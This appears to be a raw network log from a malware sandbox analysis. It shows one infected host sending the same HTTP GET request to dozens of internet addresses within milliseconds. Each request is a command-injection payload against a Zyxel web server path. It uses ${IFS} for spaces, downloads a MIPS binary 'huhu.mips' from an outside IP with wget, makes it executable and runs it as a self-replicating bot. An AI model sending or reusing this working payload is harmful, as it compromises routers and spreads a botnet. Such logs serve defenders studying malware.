                                                Jan 29, 2024 07:07:56.503851891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6442192.168.2.2344532158.239.226.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.503906012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6443192.168.2.235276291.94.234.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.503950119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6444192.168.2.236015620.145.207.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.503994942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6445192.168.2.2351222123.1.55.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.504018068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6446192.168.2.2352520196.53.50.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.504045963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6447192.168.2.2353016154.73.249.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.504103899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6448192.168.2.2353686197.155.31.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.504134893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6449192.168.2.235064878.117.146.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.504158974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6450192.168.2.2348920150.231.170.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.504230022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6451192.168.2.235565260.43.174.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.504251957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6452192.168.2.234536837.145.55.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.504297018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6453192.168.2.234751023.213.97.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.504334927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6454192.168.2.2335342118.19.225.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.504370928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6455192.168.2.2333914107.117.207.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.504405022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6456192.168.2.235436265.7.249.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.504462004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6457192.168.2.235606464.24.169.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.504499912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6458192.168.2.234270873.10.225.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.504518032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6459192.168.2.2333884143.128.33.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.504581928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6460192.168.2.2346634151.153.42.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.504668951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6461192.168.2.2344128122.57.151.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.504720926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6462192.168.2.233465263.83.217.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.504743099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6463192.168.2.2340606104.98.1.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.504770994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6464192.168.2.233437277.7.174.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.504832983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6465192.168.2.2355354172.5.255.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.504878044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6466192.168.2.2345440101.207.97.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.504899979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6467192.168.2.236093090.117.240.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.504946947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6468192.168.2.233641836.61.176.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.504992962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6469192.168.2.233569059.223.123.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505026102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6470192.168.2.2348454170.46.189.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505060911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6471192.168.2.233571039.200.208.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505098104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6472192.168.2.2342298208.85.243.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505136967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6473192.168.2.234517876.107.137.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505163908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6474192.168.2.233834025.94.247.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505214930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6475192.168.2.2346182114.222.191.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505249023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6476192.168.2.233872835.210.196.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505278111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6477192.168.2.23491044.161.229.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505317926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6478192.168.2.236006893.61.5.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505350113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6479192.168.2.2346510180.98.81.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505403996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6480192.168.2.235594897.33.203.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505451918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6481192.168.2.2352452190.120.72.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505484104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6482192.168.2.2337422207.19.76.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505538940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6483192.168.2.2360364161.43.106.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505572081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6484192.168.2.234717262.22.237.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505598068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6485192.168.2.235635862.76.6.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505630970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6486192.168.2.233317014.187.110.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505686998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6487192.168.2.234689475.88.103.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505706072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6488192.168.2.2347464103.200.113.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505744934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6489192.168.2.234783292.149.232.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505789042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6490192.168.2.2335712186.202.83.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505814075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6491192.168.2.235795812.200.146.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505853891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6492192.168.2.2355844203.106.144.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505903959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6493192.168.2.233913834.250.162.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505934000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6494192.168.2.2356266203.192.191.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.505959034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6495192.168.2.234580287.24.28.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506019115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6496192.168.2.235988464.21.40.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506055117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6497192.168.2.2336732106.253.85.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506108046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6498192.168.2.2358442157.49.17.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506144047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6499192.168.2.234420237.221.5.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506177902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6500192.168.2.2337944192.148.32.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506222010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6501192.168.2.2358180133.39.5.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506273985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6502192.168.2.2346206123.115.81.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506292105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6503192.168.2.234673032.85.240.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506319046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6504192.168.2.2350146113.185.107.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:56.506376028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6505192.168.2.2348980200.152.249.81443
                                                TimestampBytes transferredDirectionData
